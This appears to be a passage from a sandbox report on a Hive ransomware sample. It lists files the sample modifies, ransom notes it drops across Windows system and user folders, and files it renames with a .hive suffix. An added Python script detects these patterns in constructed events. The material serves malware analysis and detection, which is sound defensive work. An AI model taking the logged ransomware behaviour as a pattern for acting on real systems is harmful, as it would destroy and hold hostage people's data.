File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
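The tables above ("Drops file in Drivers directory", "Drops startup file", "Drops desktop.ini file(s)") document two behaviours a detection engineer can key on: a single process writing the same ransom note (HOW_TO_DECRYPT.txt) into many unrelated directories, and files renamed to <original>.<token>.hive, as in the Startup\desktop.ini entry. The Python below is an added example, not part of the sandbox report and not code from the Hive operators or the sandbox vendor. It replays constructed file events modelled on the report's rows and flags the process that trips either rule. The 43-character token length in the regex is taken from the one renamed file observed here and is an assumption about other samples; the directory threshold of 3 is an arbitrary tuning value.

```python
"""Added example: flag Hive-style ransom-note fan-out and .hive renames
from file-system events. Not code from the report or from the sample."""
import re
from collections import defaultdict

RANSOM_NOTE = "HOW_TO_DECRYPT.txt"
# Tuned to the one renamed file seen in the report
# (desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive): a 43-char
# URL-safe base64 token, the length of an unpadded 32-byte value. Other Hive
# builds may differ; this is an assumption, not something the report states.
HIVE_RENAMED = re.compile(r"\.[A-Za-z0-9_-]{43}\.hive$")
NOTE_DIR_THRESHOLD = 3  # distinct directories receiving the same note name

# Constructed (process, action, path) events modelled on the report's
# "File created" / "File opened for modification" rows, plus benign noise.
# Not real telemetry.
SAMPLE_EVENTS = [
    ("Hive_17_07_2021_808KB.exe", "create", r"C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt"),
    ("Hive_17_07_2021_808KB.exe", "create", r"C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt"),
    ("Hive_17_07_2021_808KB.exe", "create", r"C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt"),
    ("Hive_17_07_2021_808KB.exe", "create", r"C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt"),
    ("Hive_17_07_2021_808KB.exe", "create", r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt"),
    ("Hive_17_07_2021_808KB.exe", "modify", r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive"),
    ("Hive_17_07_2021_808KB.exe", "modify", r"C:\Users\Admin\Documents\desktop.ini"),
    ("setup.exe", "create", r"C:\Program Files\Tool\README.txt"),   # one readme: benign
    ("explorer.exe", "modify", r"C:\Users\Admin\Pictures\desktop.ini"),  # Explorer noise
]


def parent_dir(path):
    """Directory part of a Windows path."""
    return path.rsplit("\\", 1)[0]


def analyze(events, threshold=NOTE_DIR_THRESHOLD):
    """Return {process: {"note_dirs": set, "renamed": [paths]}} for every
    process that either wrote the ransom note into >= threshold distinct
    directories or touched a file carrying the .hive rename pattern."""
    note_dirs = defaultdict(set)
    renamed = defaultdict(list)
    for proc, action, path in events:
        name = path.rsplit("\\", 1)[-1]
        if action == "create" and name == RANSOM_NOTE:
            note_dirs[proc].add(parent_dir(path))
        if HIVE_RENAMED.search(name):
            renamed[proc].append(path)
    hits = {}
    for proc in set(note_dirs) | set(renamed):
        if len(note_dirs[proc]) >= threshold or renamed[proc]:
            hits[proc] = {"note_dirs": note_dirs[proc], "renamed": renamed[proc]}
    return hits


def original_name(renamed_path):
    """Strip the token and .hive suffix to recover the pre-encryption name."""
    return HIVE_RENAMED.sub("", renamed_path)


if __name__ == "__main__":
    for proc, info in analyze(SAMPLE_EVENTS).items():
        print(f"{proc}: ransom note in {len(info['note_dirs'])} directories, "
              f"{len(info['renamed'])} .hive rename(s)")
        for p in info["renamed"]:
            print("  original:", original_name(p))
```

The fan-out rule is the more portable of the two: the note filename changes between families, but one process creating the same small text file in dozens of unrelated directories within minutes is rare outside ransomware, so the note name can be left as a parameter and the threshold tuned per environment. The rename rule is specific to this sample's naming scheme and should be treated as a high-confidence but narrow indicator.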

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Speech\SpeechUX\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SecureBoot\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\vhdmp.inf_amd64_aa94d04ecf56de1f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAll\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\InstallShield\setupdir\0804\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\uk-UA\Licenses\Volume\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_amd64_bb7c44c7bb3664d0\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\Volume\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\wbem\Repository\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Printing_Admin_Scripts\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\iai2c.inf_amd64_a77c815b2999404d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmcrtix.inf_amd64_e3ded2b26d662526\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\IME\IMEKR\APPLETS\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\Windows\PLA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\drivers\W32X86\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_unknown.inf_amd64_9f92c189b415c003\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hal.inf_amd64_fd0ae947345ac7bf\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\rdpbus.inf_amd64_05ebd3b4422f62ba\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\Common\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\OneCore\DirectX\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\replacementmanifests\WindowsSearchEngine\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\sppui\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\Common\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spp\tokens\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_fscopyprotection.inf_amd64_9c108d8ac558a80d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmfj2.inf_amd64_167948d0c94abc27\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\stornvme.inf_amd64_1218fad01506b7af\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\tsusbhub.inf_amd64_bd91a147ab4ebf1c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Com\dmp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Licenses\neutral\OEM\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_extension.inf_amd64_7891c7d003f5e96b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\fidohid.inf_amd64_c446be9403cdcdb1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\SpeechUX\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WCN\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Kds\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\tw-c28-c2c-2f6b.tmp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ko-KR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Boot\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Configuration\Registration\MSFT_FileDirectoryConfiguration\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\bthleenum.inf_amd64_11f9ff6c12dbf9b5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\InputMethod\CHT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\tw-d60-d90-a182.tmp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\rspndr.inf_amd64_4e80c2bb5314f071\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\Engines\SR\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{6f126544-600f-4756-8792-b71c4e30f413}\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\pl-PL\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_fsencryption.inf_amd64_b4b4845819a23338\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAny\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.P7EsMTWem2f4DapaPblE9JLMqb0GT-MsqSXfDBplsgc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
